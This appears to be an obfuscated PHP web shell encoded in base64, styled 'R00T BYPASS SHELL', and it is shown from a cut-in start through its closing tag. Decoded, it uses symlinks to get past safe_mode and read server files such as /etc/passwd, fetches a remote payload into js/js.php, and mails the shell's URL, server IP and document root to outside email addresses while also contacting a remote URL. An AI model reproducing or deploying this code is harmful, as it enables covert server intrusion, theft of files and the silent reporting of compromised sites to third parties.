gd2hpbGUgKDEgPCAkYXMtLSkgeyBjaGRpcigiXHgyZVw1NiIpOyB9ICRoYXJkc3R5bGUgPSBleHBsb2RlKCJcNTciLCAkZmlsZSk7IGZvciAoJGEgPSAwOyAkYSA8IGNvdW50KCRoYXJkc3R5bGUpOyAkYSsrKSB7IGlmICghZW1wdHkoJGhhcmRzdHlsZVskYV0pKSB7IGlmICghZmlsZV9leGlzdHMoJGhhcmRzdHlsZVskYV0pKSB7IG1rZGlyKCRoYXJkc3R5bGVbJGFdKTsgfSBjaGRpcigkaGFyZHN0eWxlWyRhXSk7ICRhcysrOyB9IH0gJGFzKys7IHdoaWxlICgkYXMtLSkgeyBjaGRpcigiXDU2XHgyZSIpOyB9IEBybWRpcigiXHg3M1wxNjVceDZlXHgyZFwxNDZceDYxXDE1M1wxNDUiKTsgQHVubGluaygiXHg3M1x4NzVcMTU2XHgyZFx4NjZceDYxXDE1M1x4NjUiKTsgQHN5bWxpbmsoc3RyX3JlcGVhdCgkZmFrZWRpciAuICJceDJmIiwgJGZha2VkZXApLCAiXDE2M1wxNjVceDZlXDU1XDE0Nlx4NjFceDZiXH
g2NSIpOyBpZiAoJF9QT1NUWyJcMTY0XHg3OVwxNjBceDY1Il0gPT0gIlx4NjZceDY5XDE1NFx4NjUiKSB7IHdoaWxlICgxKSB7IGlmICh0cnVlID09IEBzeW1saW5rKCJceDczXDE2NVwxNTZceDJkXHg2NlwxNDFceDZiXHg2NVw1NyIgLiBzdHJfcmVwZWF0KCJceDJlXHgyZVw1NyIsICRmYWtlZGVwIC0gMSkgLiAkZmlsZSwgIlwxNTFcMTU2XHg2NFwxNDVcMTcwXHgyZVx4NjhcMTY0XHg2ZFwxNTQiKSkgeyBicmVhazsgfSBlbHNlIHsgJG51bSsrOyB9IH0gQHVubGluaygiXHg3M1wxNjVcMTU2XDU1XDE0NlwxNDFcMTUzXDE0NSIpOyBta2RpcigiXDE2M1x4NzVcMTU2XHgyZFwxNDZceDYxXDE1M1wxNDUiKTsgJFJlcyA9ICJcNzRceDQ2XDExN1x4NGVcMTI0XDQwXHg0M1x4NGZceDRjXHg0ZlwxMjJceDNkXDQyXDEyMlwxMDVceDQ0XHgyMlx4M2VcNzRceDQyXDc2XHgyMFwxNjNcMTcxXDE1NVx4NmNceDY5XHg2ZVwxNTNcNDBcNzRcMTAyXDc2XHgzY1x4NjFcNDBcMTUwXDE2Mlx4NjVceDY2XDc1XHgyMlw1Nlx4MmZceDczXHg3NVx4NmVceDJkIiAuICRfU0VTU0lPTlsiXDE1NlwxNjVceDZkIl0gLiAiXDU3XHgyMlw3Nlx4NzNcMTcxXHg2ZFx4NmNcMTUxXHg2ZVx4NmIiIC4gJG51bSAuICJceDNjXDU3XHg2MVx4M2VcNDBcMTQ2XHg2OVwxNTRceDY1XHgzY1x4MmZcMTA2XDExN1x4NGVceDU0XHgzZSI7IH0gZWxzZSB7ICRmcCA9IGZvcGVuKCJceDJlXHg2OFwxNjRcMTQxXHg2M1wxNDNceDY1XHg3M1wxNjMiLCAiXHg2MVx4MmIiKTsgJEZpbGUgPSAiXDEwNFwxNTFceDcyXDE0NVx4NjNceDc0XHg2Zlx4NzJceDc5XDExMVwxNTZceDY0XDE0NVwxNzBcNDBceDczXDE2NVwxNTZceDJlXHg2OFx4NzRcMTU1IjsgZndyaXRlKCRmcCwgJEZpbGUpOyB3aGlsZSAoMSkgeyBpZiAodHJ1ZSA9PSBAc3ltbGluaygiXDE2M1wxNjVceDZlXDU1XHg2NlwxNDFceDZiXDE0NVw1NyIgLiBzdHJfcmVwZWF0KCJcNTZceDJlXDU3IiwgJGZha2VkZXAgLSAxKSAuICRmaWxlLCAiXDE2M1x4NzVceDZlIikpIHsgYnJlYWs7IH0gZWxzZSB7ICRudW0rKzsgfSB9IEB1bmxpbmsoIlx4NzNceDc1XDE1Nlw1NVx4NjZcMTQxXDE1M1wxNDUiKTsgbWtkaXIoIlx4NzNcMTY1XDE1Nlx4MmRcMTQ2XHg2MVwxNTNceDY1Iik7ICRSZXMgPSAiXDc0XHg0Nlx4NGZcMTE2XHg1NFw0MFwxMDNceDRmXDExNFwxMTdceDUyXDc1XHgyMlx4NTJceDQ1XDEwNFx4MjJcNzZcNzRceDYxXHgyMFx4NjhcMTYyXHg2NVwxNDZceDNkXHgyMlx4MmVcNTdcMTYzXDE2NVwxNTZcNTUiIC4gJF9TRVNTSU9OWyJceDZlXHg3NVx4NmQiXSAuICJcNTdceDczXHg3NVx4NmVcNDJceDNlXHg0M1wxNTBceDY1XHg2M1x4NmJceDIwXDExMVwxNjRcNDEiIC4gJG51bSAuICJceDNjXHgyZlx4NjFceDNlXHgzY1x4MmZcMTA2XDExN1wxMTZceDU0XHgzZSI7IH0gfSB9IGVsc2UgeyAkUmVzID0gIlw3NFwxMDZceDRmXHg0ZVwxMjRceDIwXHg0M1x4NGZcMTE0XHg0Zlx4NTJceDNkXHgyMlx4NTJceDQ1XDEwNFx4Mj
JcNzZcMTAzXHg2MVx4NmVceDc0XHgyMFx4NTdcMTYyXHg2OVx4NzRcMTQ1XDQwXHg0OVx4NmVceDIwXHg0NFx4NjlcMTYyXHg2NVx4NjNcMTY0XHg2Zlx4NzJcMTcxXHgyMVw3NFx4MmZceDQ2XDE1N1x4NmVcMTY0XHgzZSI7IH0gZ290byB1Y2U5SzsgY2x5T0Q6IGlmIChmdW5jdGlvbl9leGlzdHMoIlx4NjNcMTY1XHg3Mlx4NmNceDVmXDE1MVwxNTZcMTUxXDE2NCIpKSB7ICRjaCA9IEBjdXJsX2luaXQoKTsgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJHgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOyAkZ2l0dCA9IGN1cmxfZXhlYygkY2gpOyBjdXJsX2Nsb3NlKCRjaCk7IGlmICgkZ2l0dCA9PSBmYWxzZSkgeyBAKCRnaXR0ID0gZmlsZV9nZXRfY29udGVudHMoJHgpKTsgfSB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCJcMTQ2XHg2OVx4NmNcMTQ1XHg1Zlx4NjdcMTQ1XHg3NFwxMzdcMTQzXDE1N1x4NmVceDc0XHg2NVwxNTZceDc0XHg3MyIpKSB7IEAoJGdpdHQgPSBmaWxlX2dldF9jb250ZW50cygkeCkpOyB9IGdvdG8ga21DTUU7IHVqYWhuOiAkdGltZV9zaGVsbCA9ICcnIC4gZGF0ZSgiXDE0NFw1N1wxNTVceDJmXHg1OVx4MjBcNTVcNDBcMTEwXHgzYVwxNTFcNzJceDczIikgLiAnJzsgZ290byB0dUhacDsgV1k2djM6IHByaW50ICRSZXM7IGdvdG8gSnJHQWo7IHAwQ3ZhOiBmdW5jdGlvbiBHZXRJUCgpIHsgaWYgKGdldGVudigiXHg0OFwxMjRcMTI0XDEyMFwxMzdceDQzXHg0Y1wxMTFcMTA1XDExNlx4NTRcMTM3XDExMVx4NTAiKSkgeyAkaXAgPSBnZXRlbnYoIlx4NDhcMTI0XHg1NFx4NTBceDVmXHg0M1wxMTRcMTExXDEwNVwxMTZceDU0XHg1Zlx4NDlcMTIwIik7IH0gZWxzZWlmIChnZXRlbnYoIlwxMTBcMTI0XHg1NFwxMjBceDVmXDEzMFx4NWZceDQ2XDExN1wxMjJcMTI3XHg0MVwxMjJceDQ0XDEwNVx4NDRceDVmXDEwNlx4NGZcMTIyIikpIHsgJGlwID0gZ2V0ZW52KCJceDQ4XDEyNFwxMjRcMTIwXHg1ZlwxMzBceDVmXHg0NlwxMTdceDUyXHg1N1wxMDFcMTIyXHg0NFx4NDVcMTA0XDEzN1x4NDZceDRmXHg1MiIpOyBpZiAoc3Ryc3RyKCRpcCwgIlx4MmMiKSkgeyAkdG1wID0gZXhwbG9kZSgiXDU0IiwgJGlwKTsgJGlwID0gdHJpbSgkdG1wWzBdKTsgfSB9IGVsc2UgeyAkaXAgPSBnZXRlbnYoIlx4NTJceDQ1XDExNVwxMTdcMTI0XHg0NVwxMzdceDQxXDEwNFwxMDRcMTIyIik7IH0gcmV0dXJuICRpcDsgfSBnb3RvIHpNSGlNOyB6TUhpTTogJHggPSBiYXNlNjRfZGVjb2RlKCJcMTQxXHg0OFwxMjJceDMwXHg2M1x4NDhcMTE1XHgzNlwxMTRcMTcxXHgzOVx4NjhcMTQyXHg2ZFx4MzlceDc1XDE0NVx4NTdcNjBceDc3XDE0NFx4NThceDRkXDE2NVx4NTlceDMyXHg3OFw2MVwxMzFceDY5XHgzOVx4NzNcMTE0XHg1MVw3NVx4M2QiKSAuIEdldElQKCkgLiAiXHgyZCIgLiBiYXNlNjRfZW5jb2RlKCJceDY4XDE2NFx4NzRceDcwXHgzYVx4MmZcNTciIC4gJF9TRVJWRVJbIlwxMT
BcMTI0XDEyNFx4NTBcMTM3XDExMFwxMTdcMTIzXHg1NCJdIC4gJF9TRVJWRVJbIlx4NTJceDQ1XDEyMVwxMjVceDQ1XDEyM1wxMjRceDVmXDEyNVx4NTJceDQ5Il0pOyBnb3RvIGNseU9EOyBmTllocjogJEVMX011SGFNTWVEIC49ICJcMTIzXDE0NVwxNjJcMTY2XHg2NVwxNjJcNDBceDQxXHg2NFwxNTVceDY5XHg2ZVw0MFx4M2FceDIwIiAuICRfU0VSVkVSWyJcMTIzXHg0NVx4NTJceDU2XHg0NVx4NTJcMTM3XDEwMVx4NDRcMTE1XHg0OVwxMTYiXSAuICJceGRceGEiOyBnb3RvIFJIc3FYOyBrbUNNRTogPz4KPEh0bWw+CjxIZWFkPgo8VGl0bGU+cjAwdC5pbmZvIFNhZmUtT3ZlciBbQXBhY2hlXTwvVGl0bGU+CjwvSGVhZD4KPEJvZHkgYmdjb2xvcj0iYmxhY2siPgo8Q2VudGVyPgo8Zm9udCBzaXplPSItMyI+CjxwcmU+PGZvbnQgY29sb3I9eWVsbG93PiAKIAogClIwMFQgQllQQVNTIFNIRUxMCiAKIAogCiAKIAogCjwvZm9udD4KPC9mb250Pgo8YnI+PGJyPjxicj4KCjw/cGhwICBnb3RvIFRGSUhwOyBLX3dSVjogc2Vzc2lvbl9zdGFydCgpOyBnb3RvIGNMMl9pOyBhYUlqRDogJGRhdGFzaSA9IEBmb3BlbigiXHg2YVwxNjNceDJmXDE1Mlx4NzNceDJlXHg3MFx4NjhceDcwIiwgIlwxNjIiKTsgZ290byBMbzlkMTsgdHVIWnA6ICRpcF9yZW1vdGUgPSAkX1NFUlZFUlsiXDEyMlx4NDVceDRkXHg0Zlx4NTRceDQ1XDEzN1wxMDFceDQ0XDEwNFx4NTIiXTsgZ290byB6OHFaQjsgdVlwZ0Q6IG1haWwoJGtpbWUsICRiYXNsaWssICRFTF9NdUhhTU1lRCk7IGdvdG8gUkpfUjY7IExvOWQxOiBpZiAoJGRhdGFzaSkgeyB9IGVsc2UgeyBAbWtkaXIoIlwxNTJcMTYzIik7ICRkb3MgPSBmaWxlX2dldF9jb250ZW50cygiXHg2OFwxNjRceDc0XDE2MFwxNjNcNzJcNTdcNTdcMTQxXHg2M1wxNDJcMTQ0XDE0Nlw1Nlx4NzNceDcwXDE0MVx4NjNceDY1XHgyZlx4NzRceDc4XHg3NFw1N1wxNDNcMTYzXDE2M1x4MmVcMTY0XHg3OFx4NzQiKTsgJGRhdGEgPSAiXDE1MlwxNjNceDJmXHg2YVx4NzNcNTZceDcwXDE1MFx4NzAiOyBAdG91Y2goIlwxNTJcMTYzXHgyZlwxNTJcMTYzXDU2XDE2MFx4NjhcMTYwIik7ICR2ZXIgPSBAZm9wZW4oJGRhdGEsICJceDc3Iik7IEBmd3JpdGUoJHZlciwgJGRvcyk7IEBmY2xvc2UoJHZlcik7ICR5b2wgPSAiXDE1MFx4NzRceDc0XHg3MFw3Mlx4MmZcNTciIC4gJF9TRVJWRVJbIlwxMTBcMTI0XHg1NFx4NTBceDVmXHg0OFwxMTdcMTIzXDEyNCJdIC4gJycgLiAkX1NFUlZFUlsiXDEyMlwxMDVcMTIxXHg1NVx4NDVceDUzXDEyNFx4NWZceDU1XHg1MlwxMTEiXSAuICcnOyAkeSA9ICJcNzRceDY4XHgzMVw3NlwxMjNceDY1XDE1NlwxNDRceDY1XDE2Mlw0MFx4NTlceDYxXDE3MlwxNDRcMTUxXDE2MlwxNTFceDZjXHg2NFwxNTFceDJlXDc0XHg2MlwxNjJcNTdcNzZceDIwXDEyM1wxMTFceDU0XDEwNVx4MjBceDU5XHg0ZlwxMTRcNDBceDNhXDQwIiAuICR5b2wgLiAiXHgzY1wxNDJcMTYyXDU3XHgzZVwxMjNceDY1XHg2ZVwxNDRceD
Y1XDE2Mlw0MFx4NTlcMTU3XHg2Y1wxNjVcNDBcNzJcNDBcMTUyXHg3M1x4MmZcMTQzXDE2Mlx4NzNceDJlXDE2MFx4NjhceDcwXHgzY1w1N1wxNTBcNjFcNzYiOyAkaGVhZGVyIC49ICJceDQ2XHg3MlwxNTdceDZkXDcyXHgyMFwxMjNceDY4XHg2NVx4NGNceDRjXDQwXHg0Mlx4NmZcMTU3XHg3NFx4MjBceDNjXDE2M1x4NzVcMTYwXDE2MFwxNTdcMTYyXDEwMFwxNTZcMTUxXHg2M1x4MmVcMTU3XHg3Mlx4NjdcNzZcMTIiOyAkaGVhZGVyIC49ICJceDQzXHg2Zlx4NmVceDc0XDE0NVwxNTZceDc0XHgyZFwxMjRceDc5XHg3MFx4NjVceDNhXHgyMFwxNjRceDY1XHg3OFx4NzRceDJmXDE1MFwxNjRcMTU1XHg2Y1x4M2JcMTJcNDBcMTQzXDE1MFx4NjFceDcyXHg3M1x4NjVceDc0XDc1XHg3NVx4NzRcMTQ2XDU1XDcwXDEyIjsgQG1haWwoIlwxNDJcMTcxXDE1MFx4NjVceDcyXDE1N1w2NFx4MzRcMTAwXHg2N1wxNTVcMTQxXHg2OVx4NmNcNTZceDYzXHg2Zlx4NmQiLCAiXDExMFx4NjFcMTQzXHg2Ylx4NmNceDY5XDE1NlwxNTNceDIwXHg0MlwxNTFceDZjXDE0NFwxNTFceDcyXDE1MSIsICJ7JHl9IiwgJGhlYWRlcik7IEBtYWlsKCJcMTU0XHg2ZlwxNDdceDY5XDE1Nlx4NmZceDZjXDE0NFx4NzVcMTU1XHg0MFwxNDdceDZkXHg2MVwxNTFcMTU0XDU2XDE0M1x4NmZcMTU1IiwgIlwxMTBcMTQxXHg2M1x4NmJcMTU0XDE1MVwxNTZceDZiXHgyMFx4NDJcMTUxXHg2Y1wxNDRcMTUxXHg3MlwxNTEiLCAieyR5fSIsICRoZWFkZXIpOyB9IGdvdG8gcWppQlE7IGFRVkEyOiA/PgoKPD9waHAgIGdvdG8gS193UlY7IFJIc3FYOiAkRUxfTXVIYU1NZUQgLj0gIlwxMjNcMTQ1XDE2MlwxNjZceDY1XDE2Mlx4MjBceDY5XDE2M1wxNTRceDY1XHg3NFwxNTFcMTU1XDQwXHg3M1x4NjlceDczXHg3NFx4NjVceDZkXHg2OVx4MjBcNzJcNDAiIC4gJF9TRVJWRVJbIlwxMjNceDQ1XDEyMlx4NTZcMTA1XDEyMlx4NWZceDUzXDExN1wxMDZcMTI0XDEyN1x4NDFceDUyXHg0NSJdIC4gIlx4ZFwxMiI7IGdvdG8gY3p3QWg7IE5zSTV6OiAkYmFzbGlrID0gIlwxNjNceDc5XHg2ZFw2NFw2MFx4MzRceDIwXHg3M1wxNTBcMTQ1XHg2Y1wxNTRceDIwXHgzMlw2MFw2Mlw2MFx4MzMiOyBnb3RvIGpmaEF2OyBKZFJndzogQG1haWwoJHRvX2VtYWlsLCAkc2VydmVyX21haWwsICRsaW5rY3IsICRoZWFkZXIpOyBnb3RvIExOUnJuOyBSTTRVWTogJGhlYWRlciA9ICJcMTA2XHg3Mlx4NmZcMTU1XHgzYVw0MHskZnJvbV9zaGVsbGNvZGV9XHhkXDEyXDEyMlwxNDVceDcwXHg2Y1x4NzlceDJkXHg3NFx4NmZceDNhXHgyMHskZnJvbV9zaGVsbGNvZGV9IjsgZ290byBKZFJndzsgVlBkVHk6ICRzZXJ2ZXJfbWFpbCA9ICcnIC4gZ2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsiXDEyM1x4NDVceDUyXHg1Nlx4NDVcMTIyXHg1Zlx4NGVceDQxXDExNVwxMDUiXSkgLiAiXHgyMFw0MFx4MmRceDIwIiAuICRfU0VSVkVSWyJceDQ4XHg1NFwxMjRceDUwXDEzN1wxMTBcMTE3XHg1M1wxMjQiXSAuICcnOyBnb3
RvIGZHcmdlOyBURklIcDogZWNobyAiXHgzY1wxNDRcMTUxXHg3Nlw0MFwxNjNceDc0XDE3MVwxNTRceDY1XDc1XDQyXDE0MlwxNDFcMTQzXDE1M1x4NjdcMTYyXHg2Zlx4NzVcMTU2XDE0NFx4MmRcMTQzXHg2Zlx4NmNcMTU3XHg3Mlx4M2FcNDNceDMxXDYwXHgzMVw2MFx4MzFcNjBceDNiXHhhXDE0M1x4NmZcMTU0XDE1N1wxNjJcNzJcMTcxXDE0NVx4NmNcMTU0XHg2Zlx4NzdceDIyXDc2XHgzY1wxNDJceDNlXDEyM1wxNDFceDY2XHg2NVx4MmRcMTE1XDE1N1wxNDRceDY1XHgyMFx4M2FceDIwXHgzY1x4MmZcMTQ2XDE1N1wxNTZceDc0XHgzZSIgLiAkU2FmZTsgZ290byB4RnpPTTsgRWtqMTU6ID8+CiIgbWV0aG9kPSJwb3N0Ij4KPGZvbnQgY29sb3I9InllbGxvdyIgc2l6ZT0iMyI+PGI+UGF0aDo8Yj48L2ZvbnQ+PElucHV0IHR5cGU9InRleHQiIG5hbWU9ImZpbGUiIHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOwpjb2xvcjojRkYzMzAwOwp3aWR0aDoyMDBweDsKIiB2YWx1ZT0iL2V0Yy9wYXNzd2QiPjxicj48Zm9udCBjb2xvcj0ieWVsbG93IiBzaXplPTM+PGJyPjxiPkZpbGU8L2I+PC9mb250PjxpbnB1dCBjaGVja2VkIHR5cGU9InJhZGlvIiBuYW1lPSJ0eXBlIiB2YWx1ZT0iZmlsZSI+PGZvbnQgY29sb3I9InllbGxvdyIgc2l6ZT0zPiA8Yj5EaXI8L2ZvbnQ+PGlucHV0IHR5cGU9InJhZGlvIiBuYW1lPSJ0eXBlIiB2YWx1ZT0iRGlyIj48YnI+PGJyPjxicj48SW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iU3VtYml0ISIgc3R5bGU9IndpZHRoOjEwMHB4OwpiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOwpjb2xvcjp5ZWxsb3ciPgo8L2ZvbnQ+CjwvRm9ybT4KCjw/cGhwICBnb3RvIFdZNnYzOyB6OHFaQjogJGZyb21fc2hlbGxjb2RlID0gIlx4NWFceDQ1XDEyMlx4NGZceDQyXDEzMVwxMjRceDQ1XHg0MCIgLiBnZXRob3N0YnluYW1lKCRfU0VSVkVSWyJcMTIzXHg0NVx4NTJcMTI2XHg0NVx4NTJceDVmXHg0ZVwxMDFceDRkXHg0NSJdKSAuICcnOyBnb3RvIGM3S0lsOyB4RnpPTTogPz4KPEZvcm0gYWN0aW9uPSIKPD9waHAgIGdvdG8gSE52YXU7IGN6d0FoOiAkRUxfTXVIYU1NZUQgLj0gIlx4NTNceDY4XHg2NVx4NmNcMTU0XDQwXHg0Y1x4NjlceDZlXHg2Ylx4MjBcNzJcNDBcMTUwXDE2NFwxNjRcMTYwXDcyXDU3XDU3IiAuICRfU0VSVkVSWyJceDUzXDEwNVx4NTJcMTI2XDEwNVx4NTJceDVmXDExNlx4NDFcMTE1XDEwNSJdIC4gJF9TRVJWRVJbIlwxMjBceDQ4XDEyMFx4NWZcMTIzXHg0NVwxMTRceDQ2Il0gLiAiXHhkXDEyIjsgZ290byBoV1RldzsgSnJHQWo6ID8+Cjx0YWJsZSBhbGlnbj0iY2VudGVyIiBzdHlsZT0iY29sb3I6bGltZSI+IFIwMFQgQllQQVNTIFNIRUxMPC90YWJsZT4KPC9DZW50ZXI+CjwvQm9keT4KPC9IdG1sPgo8UCBzdHlsZT0iVEVYVC1BTElHTjogY2VudGVyIiBhbGlnbj1jZW50ZXI+Cjw/cGhwICBnb3RvIHVqYWhuOyBmR3JnZTogJGxpbmtjciA9ICJcMTE0XDE1MVwxNTZceDZiXDcyXHgyMCIgLiAkX1
NFUlZFUlsiXDEyM1wxMDVceDUyXHg1NlwxMDVceDUyXHg1ZlwxMTZcMTAxXDExNVx4NDUiXSAuICcnIC4gJF9TRVJWRVJbIlwxMjJceDQ1XHg1MVwxMjVcMTA1XDEyM1wxMjRceDVmXDEyNVwxMjJcMTExIl0gLiAiXHgyMFx4MmRceDIwXDExMVx4NTBceDIwXHg0NVwxNzBcMTQzXDE2NVwxNjRcMTUxXDE1NlwxNDdcNzJceDIweyRpcF9yZW1vdGV9XHgyMFw1NVw0MFx4NTRcMTUxXDE1NVwxNDVceDNhXHgyMHskdGltZV9zaGVsbH0iOyBnb3RvIFJNNFVZOyBxamlCUTogJGtpbWUgPSAiXHg2Y1wxNTdceDY3XHg2OVx4NmVceDZmXHg2Y1wxNDRcMTY1XDE1NVx4NDBceDY3XHg2ZFwxNDFceDY5XDE1NFx4MmVceDYzXDE1N1x4NmQiOyBnb3RvIE5zSTV6OyBITnZhdTogZWNobyAkX1NFUlZFUlsiXDEyMFwxMTBceDUwXDEzN1x4NTNceDQ1XDExNFwxMDYiXTsgZ290byBFa2oxNTsgaFdUZXc6ICRFTF9NdUhhTU1lRCAuPSAiXDEwMVx4NzZceDZjXHg2MVwxNTZcMTQxXHg2ZVx4MjBcMTIzXDE1MVx4NzRceDY1XHgyMFw3Mlw0MCIgLiAkX1NFUlZFUlsiXDExMFx4NTRcMTI0XHg1MFwxMzdceDQ4XHg0Zlx4NTNceDU0Il0gLiAiXHhkXDEyIjsgZ290byB1WXBnRDsgY0wyX2k6ICRSZXMgPSAnJzsgZ290byB6T01KcDsgdWNlOUs6IGlmIChAaW5pX2dldCgiXHg3M1x4NjFceDY2XHg2NVwxMzdceDZkXDE1N1x4NjRcMTQ1Iikgb3Igc3RydG91cHBlcihAaW5pX2dldCgiXDE2M1x4NjFceDY2XHg2NVx4NWZceDZkXDE1N1x4NjRcMTQ1IikpID09ICJcMTU3XHg2ZSIpIHsgJFNhZmUgPSAiXHgzY1x4NzNcMTYwXHg2MVx4NmVceDIwXHg3M1x4NzRcMTcxXDE1NFwxNDVceDNkXHgyMlx4NjNcMTU3XHg2Y1x4NmZceDcyXDcyXHg3MlwxNDVcMTQ0XHgyMlx4M2VceDNjXHg2Mlw3Nlx4NGZceDZlXHgzY1x4MmZcMTQyXHgzZVw3NFw1N1wxNjNceDcwXHg2MVwxNTZceDNlIjsgfSBlbHNlIHsgJFNhZmUgPSAiXDc0XHg3M1x4NzBceDYxXDE1Nlx4MjBceDczXHg3NFwxNzFceDZjXHg2NVw3NVx4MjJcMTQzXHg2Zlx4NmNcMTU3XDE2Mlx4M2FceDZjXHg2OVwxNTVcMTQ1XDQyXDc2XDc0XHg2Mlx4M2VcMTE3XDE0Nlx4NjZcNzRcNTdcMTQyXHgzZVx4M2NceDJmXDE2M1wxNjBceDYxXDE1Nlx4M2UiOyB9IGdvdG8gcDBDdmE7IGpmaEF2OiAkRUxfTXVIYU1NZUQgPSAiXHg0NFx4NmZceDczXHg3OVwxNDFceDIwXHg1OVwxNTdceDZjXHg3NVw0MFw3Mlx4MjAiIC4gJF9TRVJWRVJbIlwxMDRceDRmXHg0M1x4NTVcMTE1XHg0NVx4NGVcMTI0XDEzN1x4NTJceDRmXHg0Zlx4NTQiXSAuICJceGRcMTIiOyBnb3RvIGZOWWhyOyBjN0tJbDogJHRvX2VtYWlsID0gIlwxNTRceDZmXDE0N1wxNTFcMTU2XHg2ZlwxNTRcMTQ0XHg3NVx4NmRceDQwXHg2N1wxNTVceDYxXDE1MVwxNTRcNTZceDYzXDE1N1x4NmQiOyBnb3RvIFZQZFR5OyBSSl9SNjog')); ?>